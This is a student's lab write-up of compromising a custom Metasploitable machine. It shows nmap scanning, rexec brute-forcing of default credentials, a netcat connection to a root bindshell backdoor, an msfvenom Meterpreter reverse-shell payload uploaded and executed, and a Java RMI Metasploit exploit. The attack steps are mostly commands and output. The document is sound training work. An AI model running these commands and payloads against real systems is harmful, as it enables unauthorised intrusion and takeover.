๐พMetasploitable (Custom 3)
This is a custom vulnerable machine for a penetration testing module. I had to perform certain tasks and gain root privileges within a given set of time.
Contents
Recon: N.A
Reconnaissance was not needed for this exercise
Scanning: Nmap
The target IP address was 192.168.249.150
-p-: All ports
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
-O: Enable OS detection
-oA: Output in the three major formats at once
โโโ(kaliใฟkali)-[~/custom3]
โโ$ nmap -sV -p- --open 192.168.249.150 -vvvv -oA c3Open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 18:06 +08
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 18:06
Scanning 192.168.249.150 [2 ports]
Completed Ping Scan at 18:06, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:06
Completed Parallel DNS resolution of 1 host. at 18:06, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:06
Scanning 192.168.249.150 [65535 ports]
Discovered open port 37535/tcp on 192.168.249.150
Discovered open port 1524/tcp on 192.168.249.150
Discovered open port 512/tcp on 192.168.249.150
Discovered open port 37310/tcp on 192.168.249.150
Discovered open port 513/tcp on 192.168.249.150
Discovered open port 514/tcp on 192.168.249.150
Discovered open port 42503/tcp on 192.168.249.150
Discovered open port 58931/tcp on 192.168.249.150
Completed Connect Scan at 18:06, 2.61s elapsed (65535 total ports)
Initiating Service scan at 18:06
Scanning 8 services on 192.168.249.150
Completed Service scan at 18:08, 126.19s elapsed (8 services on 1 host)
NSE: Script scanning 192.168.249.150.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.02s elapsed
Nmap scan report for 192.168.249.150
Host is up, received conn-refused (0.0011s latency).
Scanned at 2022-03-31 18:06:17 +08 for 129s
Not shown: 65505 closed tcp ports (conn-refused), 22 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
512/tcp open exec syn-ack netkit-rsh rexecd
513/tcp open login? syn-ack
514/tcp open tcpwrapped syn-ack
1524/tcp open bindshell syn-ack Bash shell (**BACKDOOR**; root shell)
37310/tcp open status syn-ack 1 (RPC #100024)
37535/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
42503/tcp open mountd syn-ack 1-3 (RPC #100005)
58931/tcp open java-rmi syn-ack GNU Classpath grmiregistry
Service Info: Host: custom3; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.12 seconds๐ Enumeration: "It Worked" Rexec-Brute (NSE)
There was a hint to investigate port 512
PORT STATE SERVICE VERSION
512/tcp open exec syn-ack netkit-rsh rexecdnmap -sV -p 512 --script=rexec-brute 192.168.249.150
โโ(kaliใฟkali)-[~/custom3]
โโ$ nmap -sV -p 512 --script=rexec-brute 192.168.249.150
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 18:19 +08
Nmap scan report for 192.168.249.150
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
512/tcp open exec netkit-rsh rexecd
| rexec-brute:
| Accounts:
| root:root - Valid credentials
| netadmin:netadmin - Valid credentials
| guest:guest - Valid credentials
| user:user - Valid credentials
| web:web - Valid credentials
| sysadmin:sysadmin - Valid credentials
| administrator:administrator - Valid credentials
| webadmin:webadmin - Valid credentials
| admin:admin - Valid credentials
| test:test - Valid credentials
|_ Statistics: Performed 13 guesses in 1 seconds, average tps: 13.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds๐ค๐ญ It seems like the above results are using the default login credentials
The next task was to find out what information was being transferred when accessing the port
msfconsole
search rexec
โโโ(kaliใฟkali)-[~/custom3]
โโ$ msfconsole
msf6 > search rexec
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/misc/consul_rexec_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Rexec
1 auxiliary/scanner/rservices/rexec_login normal No rexec Authentication Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/rservices/rexec_login
msf6 >use auxiliary/scanner/rservices/rexec_login
msf6 > use auxiliary/scanner/rservices/rexec_login
msf6 auxiliary(scanner/rservices/rexec_login) > set password root
password => root
msf6 auxiliary(scanner/rservices/rexec_login) > set rhosts 192.168.249.150
rhosts => 192.168.249.150
msf6 auxiliary(scanner/rservices/rexec_login) > set username root
username => root
msf6 auxiliary(scanner/rservices/rexec_login) > options
Module options (auxiliary/scanner/rservices/rexec_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&real
m)
ENABLE_STDERR false yes Enables connecting the stderr port
PASSWORD root no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 192.168.249.150 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
oit
RPORT 512 yes The target port (TCP)
STDERR_PORT no The port to listen on for stderr
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/rservices/rexec_login) >run
msf6 auxiliary(scanner/rservices/rexec_login) > run
[*] 192.168.249.150:512 - 192.168.249.150:512 - Starting rexec sweep
[*] 192.168.249.150:512 - 192.168.249.150:512 - Attempting rexec with username:password 'root':'root'
[-] 192.168.249.150:512 - 192.168.249.150:512 - [1/1] - Result: xxxxx xxx xxx?
[*] 192.168.249.150:512 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/rservices/rexec_login) >The secret message was revealed as the following:
[-] 192.168.249.150:512 - 192.168.249.150:512 - [1/1] - Result: xxxxx xxx xxx?
๐ Exploitation: "Succeeded" Netcat / Msfvenom
The next task requires a Meterpreter session. Hence I will make use of the following vulnerability:
PORT STATE SERVICE REASON VERSION
1524/tcp open bindshell syn-ack Bash shell (**BACKDOOR**; root shell)(Remote Host) Initiating a connection to the port 1524 on the remote host:
nc 192.168.249.150 1524
whoami
โโโ(kaliใฟkali)-[~/custom3]
โโ$ nc 192.168.249.150 1524
root@custom3:/# whoami
root
root@custom3:/# (Local Host ๐ฟ) Creating a payload using Msfvenom:
msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.249.140 lport=8999 -f elf -o payload.elf
โโโ(kaliใฟkali)-[~/custom3]
โโ$ msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.249.140 lport=8999 -f elf -o payload.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 1106792 bytes
Final size of elf file: 1106792 bytes
Saved as: payload.elf(Remote Host ๐ ) Preparing the netcat listener to receive the file 'payload.elf'
netcat -nlvp 9899 > payload.elf
โโโ(kaliใฟkali)-[~/custom3]
โโ$ nc 192.168.249.150 1524
root@custom3:/# whoami
root
root@custom3:/# netcat -nlvp 9899 > payload.elf
listening on [any] 9899 ...(Local Host ๐ฟ) Sending the file from the localhost:
netcat -w 2 192.168.249.150 9899 < payload.elf
โโโ(kaliใฟkali)-[~/custom3]
โโ$ netcat -w 2 192.168.249.150 9899 < payload.elf(Remote Host ๐) Execute the 'ls' command to verify if the file 'payload.elf' has been successfully transferred from the local host to the remote host
ls
connect to [192.168.249.150] from (UNKNOWN) [192.168.249.140] 34790
root@custom3:/# ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
payload.elf
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
root@custom3:/#(Local Host ๐ฟ) Start a listener using Msfconsole:
msfconsole
use exploit/multi/handler
set lhost 192.168.249.140
set lport 8999 (the same port number as the payload created using Msfvenom)
options
โโโ(kaliใฟkali)-[~/custom3]
โโ$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter_reverse_tcp
payload => linux/x86/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.249.140
lhost => 192.168.249.141
msf6 exploit(multi/handler) > set lport 8999
lport => 8999
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 8999 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Targetrun
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.249.140:8999 (Remote Host ๐) I will need to change the file permissions for 'payload.elf'
ls -la | grep payload.elf
root@custom3:/# ls -la | grep payload.elf
-rw-r--r-- 1 root root 1106792 Mar 31 08:15 payload.elfchmod 777 payload.elf
ls -la | grep payload.elf
root@custom3:/# chmod 777 payload.elf
root@custom3:/# ls -la | grep payload.elf
-rwxrwxrwx 1 root root 1106792 Mar 31 08:15 payload.elf
root@custom3:/# Executing the file 'payload.elf'
./payload.elf
root@custom3:/# ./payload.elf(Remote Host ๐) The following is an example of using a n unsuitable payload:
bash: [5694: 3] tcsetattr: Invalid argument
Segmentation fault
root@custom3:/# ๐ Note: If by any chance that the output error is 'segmentation fault', it could be due to the usage of a staged payload 'linux/x86/meterpreter/everse_tcp' instead of a stageless payload 'linux/x86/meterpreter_reverse_tcp'
Reference: https://github.com/rapid7/metasploit-framework/issues/12142#issuecomment-516057212
(Local Host ๐ฟ) After executing the payload on the remote host, I gained a Meterpreter session on my local host machine
getuid
sysinfo
[*] Started reverse TCP handler on 192.168.249.140:8999
[*] Meterpreter session 1 opened (192.168.249.140:8999 -> 192.168.249.150:60321 ) at 2022-03-31 20:29:58 +0800
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.249.150
OS : Ubuntu x8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > ๐ Executing 'getuid' reflected that the Sever username is 'root'!
๐ Exploitation: "Succeeded" Java RMI (Msfconsole)
I will attempt to exploit the Telnet service on port 23 using the log in credentials that I managed to acquire from earlier
PORT STATE SERVICE VERSION
58931/tcp open java-rmi GNU Classpath grmiregistrymsfconsole
โโโ(kaliใฟkali)-[~/custom3]
โโ$ msfconsole
msf6 >search type:exploit java rmi
msf6 > search type:exploit java rmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce 2019-05-22 excellent Yes Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
1 exploit/multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution
2 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
3 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation
4 exploit/multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution
5 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
6 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
7 exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
8 exploit/multi/http/totaljs_cms_widget_exec 2019-08-30 excellent Yes Total.js CMS 12 Widget JavaScript Code Injection
Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/totaljs_cms_widget_exec
msf6 >use exploit/multi/misc/java_rmi_server
set rhosts 192.168.249.150
set rport 58931
set lhost 192.168.249.140
set lport 8889
msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.249.150
rhosts => 192.168.249.150
msf6 exploit(multi/misc/java_rmi_server) > set rport 58931
rport => 58931
msf6 exploit(multi/misc/java_rmi_server) > set lhost 192.168.249.140
lhiost => 192.168.249.140
msf6 exploit(multi/misc/java_rmi_server) > set lport 8889
lport => 8889
msf6 exploit(multi/misc/java_rmi_server) > options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 192.168.249.150 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 58931 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or
0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 8889 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf6 exploit(multi/misc/java_rmi_server) >run
sf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.249.140:8889
[*] 192.168.249.150:58931 - Using URL: http://0.0.0.0:8080/ggqTzR
[*] 192.168.249.150:58931 - Local IP: http://192.168.249.140:8080/ggqTzR
[*] 192.168.249.150:58931 - Server started.
[*] 192.168.249.150:58931 - Sending RMI Header...
[*] 192.168.249.150:58931 - Sending RMI Call...
[*] 192.168.249.150:58931 - Replied to request for payload JAR
[*] Sending stage (58053 bytes) to 192.168.249.150
[*] Meterpreter session 1 opened (192.168.249.140:8889 -> 192.168.249.150:60997 ) at 2022-03-31 15:42:26 +0800
[-] 192.168.249.150:58931 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.150:58931 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >๐ค๐ญ I am getting the following errors:
[-] 192.168.249.150:58931 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.150:58931 - Server stopped.
[*] Exploit completed, but no session was created.๐ค๐ญ However it did mention that 'Meterpreter session 1 opened'. Hence, I executed 'sessions' just to check if there was indeed one
sessions
msf6 exploit(multi/misc/java_rmi_server) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter java/linux root @ custom3 192.168.249.140:8889 -> 192.168.249.150:60997 (192.168.249.150)
msf6 exploit(multi/misc/java_rmi_server) >sessions 1
getuid
sysinfo
msf6 exploit(multi/misc/java_rmi_server) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : custom3
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter >๐ Executing 'getuid' reflected that the Sever username is 'root'!
Last updated